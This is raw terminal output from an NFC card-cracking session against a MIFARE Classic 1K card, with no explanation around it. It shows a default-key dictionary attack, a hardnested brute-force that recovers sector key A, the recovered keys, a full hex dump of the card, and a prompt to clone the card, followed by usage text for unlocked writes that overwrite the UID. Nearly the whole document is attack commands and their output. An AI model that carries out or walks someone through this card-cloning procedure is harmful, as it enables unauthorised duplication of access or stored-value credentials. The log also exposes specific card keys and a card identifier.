 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
 [Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
 [Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
 [Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
 [Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
 [Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
 [Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
 [Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
 [Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
 [Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
 [Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
 [Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
 [Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1584 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
 Starting 8 threads to test 1922805806080 states using 256-way bitslicing
 Cracking... 78.92%
 Found key: 3e65e4fb65b3
 Tested 1517855538104 states
 81cc25ebbb6a
 3e65e4fb65b3
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 The custom key 0x3e65e4fb65b3 has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
 [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
 [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
 [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
 [Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
 [Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
 [Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
 [Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
 [Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
 [Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
 [Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
 [Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
 [Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
 [Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
 Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
 Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
 Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
 Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
 Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
 Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
 Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00

Dump left in: mfc_04e8f9c2a55980_dump.mfd
 Do you want clone the card? Place card on reader now and press Y [y/n] y
 Usage: nfc-mfclassic f|r|R|w|W a|b u|U<01ab23cd> <dump.mfd> [<keys.mfd> [f]]
 f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
 *** format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default
 *** unlocked read does not require authentication and will reveal A and B keys
 *** note that unlocked write will attempt to overwrite block 0 including UID
 *** unlocking only works with special Mifare 1K cards (Chinese clones)
 a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
 u|U - Use any (u) uid or supply a uid specifically as U01ab23cd.
 <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
 <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
 f - Force using the keyfile even if UID does not match (optional)
 Examples:

Read c nfc-mfclassic f B u dummy.mfd keyfile.mfd f

Read card to file, using key A and uid 0x01 0xab 0x23 0xcd:

nfc-mfclassic r a U01ab23cd mycard.mfd
